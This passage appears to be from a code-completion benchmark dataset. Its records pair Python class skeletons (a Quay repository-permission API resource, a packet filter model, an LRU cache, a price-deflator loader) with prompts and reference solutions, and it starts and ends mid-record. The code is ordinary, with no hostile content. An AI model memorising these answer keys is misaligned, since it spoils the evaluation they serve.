new_permission['role']}, repo_name=repository_name)\n return (resp, 200)\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n model.delete_repo_permission_for_user(username, namespace_name, repository_name)\n except DeleteException as ex:\n raise request_error(exception=ex)\n log_action('delete_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name}, repo_name=repository_name)\n return ('', 204)\n<|end_body_2|>\n", "class_docstring": "Resource for managing individual user permissions.", "class_name": "RepositoryUserPermission", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RepositoryUserPermission:\n \"\"\"Resource for managing individual user permissions.\"\"\"\n\n def get(self, namespace_name, repository_name, username):\n \"\"\"Get the permission for the specified user.\"\"\"\n <|body_0|>\n\n def put(self, namespace_name, repository_name, username):\n \"\"\"Update the perimssions for an existing repository.\"\"\"\n <|body_1|>\n\n def delete(self, namespace_name, repository_name, username):\n \"\"\"Delete the permission for the user.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Get repo: %s/%s permissions for user %s', namespace_name, repository_name, username)\n perm = model.get_repo_permission_for_user(username, namespace_name, repository_name)\n return perm.to_dict()\n<|end_body_0|>\n\n<|body_start_1|>\n new_permission = request.get_json()\n logger.debug('Setting permission to: %s for user %s', new_permission['role'], username)\n try:\n perm = model.set_repo_permission_for_user(username, namespace_name, repository_name, new_permission['role'])\n resp = perm.to_dict()\n except SaveException as ex:\n raise request_error(exception=ex)\n log_action('change_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name, 'role': new_permission['role']}, repo_name=repository_name)\n return (resp, 200)\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n model.delete_repo_permission_for_user(username, namespace_name, repository_name)\n except DeleteException as ex:\n raise request_error(exception=ex)\n log_action('delete_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name}, repo_name=repository_name)\n return ('', 204)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000181", "length_bytes": 8862, "license_type": "permissive", "methods": [{"docstring": "Get the permission for the specified user.", "name": "get", "signature": "def get(self, namespace_name, repository_name, username)"}, {"docstring": "Update the perimssions for an existing repository.", "name": "put", "signature": "def put(self, namespace_name, repository_name, username)"}, {"docstring": "Delete the permission for the user.", "name": "delete", "signature": "def delete(self, namespace_name, repository_name, username)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006334", "prompt": "Implement the Python class `RepositoryUserPermission` described below.\n\nClass description:\nResource for managing individual user permissions.\n\nMethod signatures and docstrings:\n- def get(self, namespace_name, repository_name, username): Get the permission for the specified user.\n- def put(self, namespace_name, repository_name, username): Update the perimssions for an existing repository.\n- def delete(self, namespace_name, repository_name, username): Delete the permission for the user.", "prompted_full_text": "Implement the Python class `RepositoryUserPermission` described below.\n\nClass description:\nResource for managing individual user permissions.\n\nMethod signatures and docstrings:\n- def get(self, namespace_name, repository_name, username): Get the permission for the specified user.\n- def put(self, namespace_name, repository_name, username): Update the perimssions for an existing repository.\n- def delete(self, namespace_name, repository_name, username): Delete the permission for the user.\n\n<|skeleton|>\nclass RepositoryUserPermission:\n \"\"\"Resource for managing individual user permissions.\"\"\"\n\n def get(self, namespace_name, repository_name, username):\n \"\"\"Get the permission for the specified user.\"\"\"\n <|body_0|>\n\n def put(self, namespace_name, repository_name, username):\n \"\"\"Update the perimssions for an existing repository.\"\"\"\n <|body_1|>\n\n def delete(self, namespace_name, repository_name, username):\n \"\"\"Delete the permission for the user.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Get repo: %s/%s permissions for user %s', namespace_name, repository_name, username)\n perm = model.get_repo_permission_for_user(username, namespace_name, repository_name)\n return perm.to_dict()\n<|end_body_0|>\n\n<|body_start_1|>\n new_permission = request.get_json()\n logger.debug('Setting permission to: %s for user %s', new_permission['role'], username)\n try:\n perm = model.set_repo_permission_for_user(username, namespace_name, repository_name, new_permission['role'])\n resp = perm.to_dict()\n except SaveException as ex:\n raise request_error(exception=ex)\n log_action('change_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name, 'role': new_permission['role']}, repo_name=repository_name)\n return (resp, 200)\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n model.delete_repo_permission_for_user(username, namespace_name, repository_name)\n except DeleteException as ex:\n raise request_error(exception=ex)\n log_action('delete_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name}, repo_name=repository_name)\n return ('', 204)\n<|end_body_2|>\n", "revision_id": "e400a0c22c5f89dd35d571654b13d262b1f6e3b3", "skeleton": "<|skeleton|>\nclass RepositoryUserPermission:\n \"\"\"Resource for managing individual user permissions.\"\"\"\n\n def get(self, namespace_name, repository_name, username):\n \"\"\"Get the permission for the specified user.\"\"\"\n <|body_0|>\n\n def put(self, namespace_name, repository_name, username):\n \"\"\"Update the perimssions for an existing repository.\"\"\"\n <|body_1|>\n\n def delete(self, namespace_name, repository_name, username):\n \"\"\"Delete the permission for the user.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RepositoryUserPermission:\n \"\"\"Resource for managing individual user permissions.\"\"\"\n\n def get(self, namespace_name, repository_name, username):\n \"\"\"Get the permission for the specified user.\"\"\"\n logger.debug('Get repo: %s/%s permissions for user %s', namespace_name, repository_name, username)\n perm = model.get_repo_permission_for_user(username, namespace_name, repository_name)\n return perm.to_dict()\n\n def put(self, namespace_name, repository_name, username):\n \"\"\"Update the perimssions for an existing repository.\"\"\"\n new_permission = request.get_json()\n logger.debug('Setting permission to: %s for user %s', new_permission['role'], username)\n try:\n perm = model.set_repo_permission_for_user(username, namespace_name, repository_name, new_permission['role'])\n resp = perm.to_dict()\n except SaveException as ex:\n raise request_error(exception=ex)\n log_action('change_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name, 'role': new_permission['role']}, repo_name=repository_name)\n return (resp, 200)\n\n def delete(self, namespace_name, repository_name, username):\n \"\"\"Delete the permission for the user.\"\"\"\n try:\n model.delete_repo_permission_for_user(username, namespace_name, repository_name)\n except DeleteException as ex:\n raise request_error(exception=ex)\n log_action('delete_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name}, repo_name=repository_name)\n return ('', 204)\n", "source": "the_stack_v2_python_sparse", "source_path": "endpoints/api/permission.py", "source_repo": "quay/quay", "split": "test", "star_events_count": 2363} {"blob_id": "07ec6d159647e67be88be21ce15767639c5a6122", "bodies": ["self.type = None\nself.subsvc = None\nself.submsg = None", "self.type = type\nself.subsvc = subsvc\nself.submsg = submsg", "if self.type == '' and self.subsvc == 0 and (self.submsg == 0):\n return None\nfiltr = {'type': self.type, 'svc': self.subsvc, 'msg': self.submsg}\nprint(filtr)\nreturn filtr"], "bodies_text": "<|body_start_0|>\n self.type = None\n self.subsvc = None\n self.submsg = None\n<|end_body_0|>\n\n<|body_start_1|>\n self.type = type\n self.subsvc = subsvc\n self.submsg = submsg\n<|end_body_1|>\n\n<|body_start_2|>\n if self.type == '' and self.subsvc == 0 and (self.submsg == 0):\n return None\n filtr = {'type': self.type, 'svc': self.subsvc, 'msg': self.submsg}\n print(filtr)\n return filtr\n<|end_body_2|>\n", "class_docstring": "This class represents the model of a Filter view. It defines the type of the packets to be shown, the subservice id and the submessage id", "class_name": "FilterModel", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FilterModel:\n \"\"\"This class represents the model of a Filter view. It defines the type of the packets to be shown, the subservice id and the submessage id\"\"\"\n\n def __init__(self):\n \"\"\"This is the constructor of the class\"\"\"\n <|body_0|>\n\n def set_filter_options(self, type: str, subsvc: int, submsg: int):\n \"\"\"This method sets all the parameters :param type: The packet type :param subsvc: The packet subservice :param submsg: The packet submessage\"\"\"\n <|body_1|>\n\n def get_filter_options(self):\n \"\"\"This method gets all the parameters of the filter :return: A dictionary with all the teh parameters of tge filter\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.type = None\n self.subsvc = None\n self.submsg = None\n<|end_body_0|>\n\n<|body_start_1|>\n self.type = type\n self.subsvc = subsvc\n self.submsg = submsg\n<|end_body_1|>\n\n<|body_start_2|>\n if self.type == '' and self.subsvc == 0 and (self.submsg == 0):\n return None\n filtr = {'type': self.type, 'svc': self.subsvc, 'msg': self.submsg}\n print(filtr)\n return filtr\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000182", "length_bytes": 1116, "license_type": "no_license", "methods": [{"docstring": "This is the constructor of the class", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "This method sets all the parameters :param type: The packet type :param subsvc: The packet subservice :param submsg: The packet submessage", "name": "set_filter_options", "signature": "def set_filter_options(self, type: str, subsvc: int, submsg: int)"}, {"docstring": "This method gets all the parameters of the filter :return: A dictionary with all the teh parameters of tge filter", "name": "get_filter_options", "signature": "def get_filter_options(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007204", "prompt": "Implement the Python class `FilterModel` described below.\n\nClass description:\nThis class represents the model of a Filter view. It defines the type of the packets to be shown, the subservice id and the submessage id\n\nMethod signatures and docstrings:\n- def __init__(self): This is the constructor of the class\n- def set_filter_options(self, type: str, subsvc: int, submsg: int): This method sets all the parameters :param type: The packet type :param subsvc: The packet subservice :param submsg: The packet submessage\n- def get_filter_options(self): This method gets all the parameters of the filter :return: A dictionary with all the teh parameters of tge filter", "prompted_full_text": "Implement the Python class `FilterModel` described below.\n\nClass description:\nThis class represents the model of a Filter view. It defines the type of the packets to be shown, the subservice id and the submessage id\n\nMethod signatures and docstrings:\n- def __init__(self): This is the constructor of the class\n- def set_filter_options(self, type: str, subsvc: int, submsg: int): This method sets all the parameters :param type: The packet type :param subsvc: The packet subservice :param submsg: The packet submessage\n- def get_filter_options(self): This method gets all the parameters of the filter :return: A dictionary with all the teh parameters of tge filter\n\n<|skeleton|>\nclass FilterModel:\n \"\"\"This class represents the model of a Filter view. It defines the type of the packets to be shown, the subservice id and the submessage id\"\"\"\n\n def __init__(self):\n \"\"\"This is the constructor of the class\"\"\"\n <|body_0|>\n\n def set_filter_options(self, type: str, subsvc: int, submsg: int):\n \"\"\"This method sets all the parameters :param type: The packet type :param subsvc: The packet subservice :param submsg: The packet submessage\"\"\"\n <|body_1|>\n\n def get_filter_options(self):\n \"\"\"This method gets all the parameters of the filter :return: A dictionary with all the teh parameters of tge filter\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.type = None\n self.subsvc = None\n self.submsg = None\n<|end_body_0|>\n\n<|body_start_1|>\n self.type = type\n self.subsvc = subsvc\n self.submsg = submsg\n<|end_body_1|>\n\n<|body_start_2|>\n if self.type == '' and self.subsvc == 0 and (self.submsg == 0):\n return None\n filtr = {'type': self.type, 'svc': self.subsvc, 'msg': self.submsg}\n print(filtr)\n return filtr\n<|end_body_2|>\n", "revision_id": "9ac0538ae38d48149db9ce52a3112515e8ff1bb5", "skeleton": "<|skeleton|>\nclass FilterModel:\n \"\"\"This class represents the model of a Filter view. It defines the type of the packets to be shown, the subservice id and the submessage id\"\"\"\n\n def __init__(self):\n \"\"\"This is the constructor of the class\"\"\"\n <|body_0|>\n\n def set_filter_options(self, type: str, subsvc: int, submsg: int):\n \"\"\"This method sets all the parameters :param type: The packet type :param subsvc: The packet subservice :param submsg: The packet submessage\"\"\"\n <|body_1|>\n\n def get_filter_options(self):\n \"\"\"This method gets all the parameters of the filter :return: A dictionary with all the teh parameters of tge filter\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FilterModel:\n \"\"\"This class represents the model of a Filter view. It defines the type of the packets to be shown, the subservice id and the submessage id\"\"\"\n\n def __init__(self):\n \"\"\"This is the constructor of the class\"\"\"\n self.type = None\n self.subsvc = None\n self.submsg = None\n\n def set_filter_options(self, type: str, subsvc: int, submsg: int):\n \"\"\"This method sets all the parameters :param type: The packet type :param subsvc: The packet subservice :param submsg: The packet submessage\"\"\"\n self.type = type\n self.subsvc = subsvc\n self.submsg = submsg\n\n def get_filter_options(self):\n \"\"\"This method gets all the parameters of the filter :return: A dictionary with all the teh parameters of tge filter\"\"\"\n if self.type == '' and self.subsvc == 0 and (self.submsg == 0):\n return None\n filtr = {'type': self.type, 'svc': self.subsvc, 'msg': self.submsg}\n print(filtr)\n return filtr\n", "source": "the_stack_v2_python_sparse", "source_path": "app/Model/FilterModel.py", "source_repo": "ESROCOS/tools-pusconsole", "split": "test", "star_events_count": 0} {"blob_id": "cdcef1ae782e52f73075323746554944e8b32cb2", "bodies": ["self.__size = size\nself.__cache = OrderedDict()\nself.__label = label", "try:\n value = self.__cache.pop(key)\n self.__cache[key] = value\n return value\nexcept KeyError:\n return None", "try:\n try:\n self.__cache.pop(key)\n except KeyError:\n if len(self.__cache) >= self.__size:\n self.__cache.popitem(last=False)\n self.__cache[key] = value\n return True\nexcept Exception as e:\n logger.exception('Failing for %s with %s', self.__label, str(e))\nreturn False"], "bodies_text": "<|body_start_0|>\n self.__size = size\n self.__cache = OrderedDict()\n self.__label = label\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n value = self.__cache.pop(key)\n self.__cache[key] = value\n return value\n except KeyError:\n return None\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n try:\n self.__cache.pop(key)\n except KeyError:\n if len(self.__cache) >= self.__size:\n self.__cache.popitem(last=False)\n self.__cache[key] = value\n return True\n except Exception as e:\n logger.exception('Failing for %s with %s', self.__label, str(e))\n return False\n<|end_body_2|>\n", "class_docstring": "LRU style cache.", "class_name": "CacheUtils", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CacheUtils:\n \"\"\"LRU style cache.\"\"\"\n\n def __init__(self, size=10, label='cache'):\n \"\"\"LRU style cache Args: size (int, optional): maximum number of elements in the cache. Defaults to 10. label (str, optional): A label an instance of the cache. Defaults to \"cache\".\"\"\"\n <|body_0|>\n\n def get(self, key):\n \"\"\"Return the cached value associated with the input key. The key:value combination are moved to top of the cache. Args: key (hashable): identifier for cached object Returns: (any): Cached object associated with the input key or None\"\"\"\n <|body_1|>\n\n def set(self, key, value):\n \"\"\"Store the input value in the cache. The cache contents of the cache are adjusted if the size limit is exceeded. Args: key (hashable): identifier for cached object value (any): value to be cached Returns: bool: True for success or false otherwise\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__size = size\n self.__cache = OrderedDict()\n self.__label = label\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n value = self.__cache.pop(key)\n self.__cache[key] = value\n return value\n except KeyError:\n return None\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n try:\n self.__cache.pop(key)\n except KeyError:\n if len(self.__cache) >= self.__size:\n self.__cache.popitem(last=False)\n self.__cache[key] = value\n return True\n except Exception as e:\n logger.exception('Failing for %s with %s', self.__label, str(e))\n return False\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000183", "length_bytes": 1828, "license_type": "permissive", "methods": [{"docstring": "LRU style cache Args: size (int, optional): maximum number of elements in the cache. Defaults to 10. label (str, optional): A label an instance of the cache. Defaults to \"cache\".", "name": "__init__", "signature": "def __init__(self, size=10, label='cache')"}, {"docstring": "Return the cached value associated with the input key. The key:value combination are moved to top of the cache. Args: key (hashable): identifier for cached object Returns: (any): Cached object associated with the input key or None", "name": "get", "signature": "def get(self, key)"}, {"docstring": "Store the input value in the cache. The cache contents of the cache are adjusted if the size limit is exceeded. Args: key (hashable): identifier for cached object value (any): value to be cached Returns: bool: True for success or false otherwise", "name": "set", "signature": "def set(self, key, value)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006553", "prompt": "Implement the Python class `CacheUtils` described below.\n\nClass description:\nLRU style cache.\n\nMethod signatures and docstrings:\n- def __init__(self, size=10, label='cache'): LRU style cache Args: size (int, optional): maximum number of elements in the cache. Defaults to 10. label (str, optional): A label an instance of the cache. Defaults to \"cache\".\n- def get(self, key): Return the cached value associated with the input key. The key:value combination are moved to top of the cache. Args: key (hashable): identifier for cached object Returns: (any): Cached object associated with the input key or None\n- def set(self, key, value): Store the input value in the cache. The cache contents of the cache are adjusted if the size limit is exceeded. Args: key (hashable): identifier for cached object value (any): value to be cached Returns: bool: True for success or false otherwise", "prompted_full_text": "Implement the Python class `CacheUtils` described below.\n\nClass description:\nLRU style cache.\n\nMethod signatures and docstrings:\n- def __init__(self, size=10, label='cache'): LRU style cache Args: size (int, optional): maximum number of elements in the cache. Defaults to 10. label (str, optional): A label an instance of the cache. Defaults to \"cache\".\n- def get(self, key): Return the cached value associated with the input key. The key:value combination are moved to top of the cache. Args: key (hashable): identifier for cached object Returns: (any): Cached object associated with the input key or None\n- def set(self, key, value): Store the input value in the cache. The cache contents of the cache are adjusted if the size limit is exceeded. Args: key (hashable): identifier for cached object value (any): value to be cached Returns: bool: True for success or false otherwise\n\n<|skeleton|>\nclass CacheUtils:\n \"\"\"LRU style cache.\"\"\"\n\n def __init__(self, size=10, label='cache'):\n \"\"\"LRU style cache Args: size (int, optional): maximum number of elements in the cache. Defaults to 10. label (str, optional): A label an instance of the cache. Defaults to \"cache\".\"\"\"\n <|body_0|>\n\n def get(self, key):\n \"\"\"Return the cached value associated with the input key. The key:value combination are moved to top of the cache. Args: key (hashable): identifier for cached object Returns: (any): Cached object associated with the input key or None\"\"\"\n <|body_1|>\n\n def set(self, key, value):\n \"\"\"Store the input value in the cache. The cache contents of the cache are adjusted if the size limit is exceeded. Args: key (hashable): identifier for cached object value (any): value to be cached Returns: bool: True for success or false otherwise\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__size = size\n self.__cache = OrderedDict()\n self.__label = label\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n value = self.__cache.pop(key)\n self.__cache[key] = value\n return value\n except KeyError:\n return None\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n try:\n self.__cache.pop(key)\n except KeyError:\n if len(self.__cache) >= self.__size:\n self.__cache.popitem(last=False)\n self.__cache[key] = value\n return True\n except Exception as e:\n logger.exception('Failing for %s with %s', self.__label, str(e))\n return False\n<|end_body_2|>\n", "revision_id": "02178b2e04eb80e21caaa1c596d904af91b8e502", "skeleton": "<|skeleton|>\nclass CacheUtils:\n \"\"\"LRU style cache.\"\"\"\n\n def __init__(self, size=10, label='cache'):\n \"\"\"LRU style cache Args: size (int, optional): maximum number of elements in the cache. Defaults to 10. label (str, optional): A label an instance of the cache. Defaults to \"cache\".\"\"\"\n <|body_0|>\n\n def get(self, key):\n \"\"\"Return the cached value associated with the input key. The key:value combination are moved to top of the cache. Args: key (hashable): identifier for cached object Returns: (any): Cached object associated with the input key or None\"\"\"\n <|body_1|>\n\n def set(self, key, value):\n \"\"\"Store the input value in the cache. The cache contents of the cache are adjusted if the size limit is exceeded. Args: key (hashable): identifier for cached object value (any): value to be cached Returns: bool: True for success or false otherwise\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CacheUtils:\n \"\"\"LRU style cache.\"\"\"\n\n def __init__(self, size=10, label='cache'):\n \"\"\"LRU style cache Args: size (int, optional): maximum number of elements in the cache. Defaults to 10. label (str, optional): A label an instance of the cache. Defaults to \"cache\".\"\"\"\n self.__size = size\n self.__cache = OrderedDict()\n self.__label = label\n\n def get(self, key):\n \"\"\"Return the cached value associated with the input key. The key:value combination are moved to top of the cache. Args: key (hashable): identifier for cached object Returns: (any): Cached object associated with the input key or None\"\"\"\n try:\n value = self.__cache.pop(key)\n self.__cache[key] = value\n return value\n except KeyError:\n return None\n\n def set(self, key, value):\n \"\"\"Store the input value in the cache. The cache contents of the cache are adjusted if the size limit is exceeded. Args: key (hashable): identifier for cached object value (any): value to be cached Returns: bool: True for success or false otherwise\"\"\"\n try:\n try:\n self.__cache.pop(key)\n except KeyError:\n if len(self.__cache) >= self.__size:\n self.__cache.popitem(last=False)\n self.__cache[key] = value\n return True\n except Exception as e:\n logger.exception('Failing for %s with %s', self.__label, str(e))\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "rcsb/utils/io/CacheUtils.py", "source_repo": "rcsb/py-rcsb_utils_io", "split": "test", "star_events_count": 0} {"blob_id": "33795fb522e68ba325830305dc76aab9e4866567", "bodies": ["cache_key = calendar_year\nif cache_key not in ImplicitPriceDeflators._cache:\n calendar_years = pd.Series(ImplicitPriceDeflators._data.keys())\n if len(calendar_years[calendar_years <= calendar_year]) > 0:\n year = max(calendar_years[calendar_years <= calendar_year])\n ImplicitPriceDeflators._cache[cache_key] = ImplicitPriceDeflators._data[year]['price_deflator']\n else:\n raise Exception(f'Missing implicit price deflator for {calendar_year} or prior')\n if max(calendar_years[calendar_years <= calendar_year]) < calendar_year:\n raise Exception(f'Missing implicit price deflator for {calendar_year}')\nreturn ImplicitPriceDeflators._cache[cache_key]", "analysis_basis = omega_globals.options.analysis_dollar_basis\nadj_factor_numerator = ImplicitPriceDeflators.get_price_deflator(analysis_basis)\nadj_factor_denominator = ImplicitPriceDeflators.get_price_deflator(dollar_basis_input)\nadj_factor = adj_factor_numerator / adj_factor_denominator\nreturn adj_factor", "ImplicitPriceDeflators._data.clear()\nImplicitPriceDeflators._cache.clear()\nif verbose:\n omega_log.logwrite('\\nInitializing data from %s...' % filename)\ninput_template_name = 'context_implicit_price_deflators'\ninput_template_version = 0.22\ninput_template_columns = {'calendar_year', 'price_deflator'}\ntemplate_errors = validate_template_version_info(filename, input_template_name, input_template_version, verbose=verbose)\nif not template_errors:\n df = pd.read_csv(filename, skiprows=1)\n template_errors = validate_template_column_names(filename, input_template_columns, df.columns, verbose=verbose)\n if not template_errors:\n ImplicitPriceDeflators._data = df.set_index('calendar_year').to_dict(orient='index')\nreturn template_errors"], "bodies_text": "<|body_start_0|>\n cache_key = calendar_year\n if cache_key not in ImplicitPriceDeflators._cache:\n calendar_years = pd.Series(ImplicitPriceDeflators._data.keys())\n if len(calendar_years[calendar_years <= calendar_year]) > 0:\n year = max(calendar_years[calendar_years <= calendar_year])\n ImplicitPriceDeflators._cache[cache_key] = ImplicitPriceDeflators._data[year]['price_deflator']\n else:\n raise Exception(f'Missing implicit price deflator for {calendar_year} or prior')\n if max(calendar_years[calendar_years <= calendar_year]) < calendar_year:\n raise Exception(f'Missing implicit price deflator for {calendar_year}')\n return ImplicitPriceDeflators._cache[cache_key]\n<|end_body_0|>\n\n<|body_start_1|>\n analysis_basis = omega_globals.options.analysis_dollar_basis\n adj_factor_numerator = ImplicitPriceDeflators.get_price_deflator(analysis_basis)\n adj_factor_denominator = ImplicitPriceDeflators.get_price_deflator(dollar_basis_input)\n adj_factor = adj_factor_numerator / adj_factor_denominator\n return adj_factor\n<|end_body_1|>\n\n<|body_start_2|>\n ImplicitPriceDeflators._data.clear()\n ImplicitPriceDeflators._cache.clear()\n if verbose:\n omega_log.logwrite('\\nInitializing data from %s...' % filename)\n input_template_name = 'context_implicit_price_deflators'\n input_template_version = 0.22\n input_template_columns = {'calendar_year', 'price_deflator'}\n template_errors = validate_template_version_info(filename, input_template_name, input_template_version, verbose=verbose)\n if not template_errors:\n df = pd.read_csv(filename, skiprows=1)\n template_errors = validate_template_column_names(filename, input_template_columns, df.columns, verbose=verbose)\n if not template_errors:\n ImplicitPriceDeflators._data = df.set_index('calendar_year').to_dict(orient='index')\n return template_errors\n<|end_body_2|>\n", "class_docstring": "**Loads and provides access to implicit price deflators by calendar year.**", "class_name": "ImplicitPriceDeflators", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ImplicitPriceDeflators:\n \"\"\"**Loads and provides access to implicit price deflators by calendar year.**\"\"\"\n\n def get_price_deflator(calendar_year):\n \"\"\"Get the implicit price deflator for the given calendar year. Args: calendar_year (int): the calendar year to get the function for Returns: The implicit price deflator for the given calendar year.\"\"\"\n <|body_0|>\n\n def dollar_adjustment_factor(dollar_basis_input):\n \"\"\"Args: dollar_basis_input (int): the dollar basis of the input value. Returns: The multiplicative factor that can be applied to a cost in dollar_basis_input to express that value in analysis_dollar_basis.\"\"\"\n <|body_1|>\n\n def init_from_file(filename, verbose=False):\n \"\"\"Initialize class data from input file. Args: filename (str): name of input file verbose (bool): enable additional console and logfile output if True Returns: List of template/input errors, else empty list on success\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cache_key = calendar_year\n if cache_key not in ImplicitPriceDeflators._cache:\n calendar_years = pd.Series(ImplicitPriceDeflators._data.keys())\n if len(calendar_years[calendar_years <= calendar_year]) > 0:\n year = max(calendar_years[calendar_years <= calendar_year])\n ImplicitPriceDeflators._cache[cache_key] = ImplicitPriceDeflators._data[year]['price_deflator']\n else:\n raise Exception(f'Missing implicit price deflator for {calendar_year} or prior')\n if max(calendar_years[calendar_years <= calendar_year]) < calendar_year:\n raise Exception(f'Missing implicit price deflator for {calendar_year}')\n return ImplicitPriceDeflators._cache[cache_key]\n<|end_body_0|>\n\n<|body_start_1|>\n analysis_basis = omega_globals.options.analysis_dollar_basis\n adj_factor_numerator = ImplicitPriceDeflators.get_price_deflator(analysis_basis)\n adj_factor_denominator = ImplicitPriceDeflators.get_price_deflator(dollar_basis_input)\n adj_factor = adj_factor_numerator / adj_factor_denominator\n return adj_factor\n<|end_body_1|>\n\n<|body_start_2|>\n ImplicitPriceDeflators._data.clear()\n ImplicitPriceDeflators._cache.clear()\n if verbose:\n omega_log.logwrite('\\nInitializing data from %s...' % filename)\n input_template_name = 'context_implicit_price_deflators'\n input_template_version = 0.22\n input_template_columns = {'calendar_year', 'price_deflator'}\n template_errors = validate_template_version_info(filename, input_template_name, input_template_version, verbose=verbose)\n if not template_errors:\n df = pd.read_csv(filename, skiprows=1)\n template_errors = validate_template_column_names(filename, input_template_columns, df.columns, verbose=verbose)\n if not template_errors:\n ImplicitPriceDeflators._data = df.set_index('calendar_year').to_dict(orient='index')\n return template_errors\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000184", "length_bytes": 5369, "license_type": "no_license", "methods": [{"docstring": "Get the implicit price deflator for the given calendar year. Args: calendar_year (int): the calendar year to get the function for Returns: The implicit price deflator for the given calendar year.", "name": "get_price_deflator", "signature": "def get_price_deflator(calendar_year)"}, {"docstring": "Args: dollar_basis_input (int): the dollar basis of the input value. Returns: The multiplicative factor that can be applied to a cost in dollar_basis_input to express that value in analysis_dollar_basis.", "name": "dollar_adjustment_factor", "signature": "def dollar_adjustment_factor(dollar_basis_input)"}, {"docstring": "Initialize class data from input file. Args: filename (str): name of input file verbose (bool): enable additional console and logfile output if True Returns: List of template/input errors, else empty list on success", "name": "init_from_file", "signature": "def init_from_file(filename, verbose=False)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007159", "prompt": "Implement the Python class `ImplicitPriceDeflators` described below.\n\nClass description:\n**Loads and provides access to implicit price deflators by calendar year.**\n\nMethod signatures and docstrings:\n- def get_price_deflator(calendar_year): Get the implicit price deflator for the given calendar year. Args: calendar_year (int): the calendar year to get the function for Returns: The implicit price deflator for the given calendar year.\n- def dollar_adjustment_factor(dollar_basis_input): Args: dollar_basis_input (int): the dollar basis of the input value. Returns: The multiplicative factor that can be applied to a cost in dollar_basis_input to express that value in analysis_dollar_basis.\n- def init_from_file(filename, verbose=False): Initialize class data from input file. Args: filename (str): name of input file verbose (bool): enable additional console and logfile output if True Returns: List of template/input errors, else empty list on success", "prompted_full_text": "Implement the Python class `ImplicitPriceDeflators` described below.\n\nClass description:\n**Loads and provides access to implicit price deflators by calendar year.**\n\nMethod signatures and docstrings:\n- def get_price_deflator(calendar_year): Get the implicit price deflator for the given calendar year. Args: calendar_year (int): the calendar year to get the function for Returns: The implicit price deflator for the given calendar year.\n- def dollar_adjustment_factor(dollar_basis_input): Args: dollar_basis_input (int): the dollar basis of the input value. Returns: The multiplicative factor that can be applied to a cost in dollar_basis_input to express that value in analysis_dollar_basis.\n- def init_from_file(filename, verbose=False): Initialize class data from input file. Args: filename (str): name of input file verbose (bool): enable additional console and logfile output if True Returns: List of template/input errors, else empty list on success\n\n<|skeleton|>\nclass ImplicitPriceDeflators:\n \"\"\"**Loads and provides access to implicit price deflators by calendar year.**\"\"\"\n\n def get_price_deflator(calendar_year):\n \"\"\"Get the implicit price deflator for the given calendar year. Args: calendar_year (int): the calendar year to get the function for Returns: The implicit price deflator for the given calendar year.\"\"\"\n <|body_0|>\n\n def dollar_adjustment_factor(dollar_basis_input):\n \"\"\"Args: dollar_basis_input (int): the dollar basis of the input value. Returns: The multiplicative factor that can be applied to a cost in dollar_basis_input to express that value in analysis_dollar_basis.\"\"\"\n <|body_1|>\n\n def init_from_file(filename, verbose=False):\n \"\"\"Initialize class data from input file. Args: filename (str): name of input file verbose (bool): enable additional console and logfile output if True Returns: List of template/input errors, else empty list on success\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cache_key = calendar_year\n if cache_key not in ImplicitPriceDeflators._cache:\n calendar_years = pd.Series(ImplicitPriceDeflators._data.keys())\n if len(calendar_years[calendar_years <= calendar_year]) > 0:\n year = max(calendar_years[calendar_years <= calendar_year])\n ImplicitPriceDeflators._cache[cache_key] = 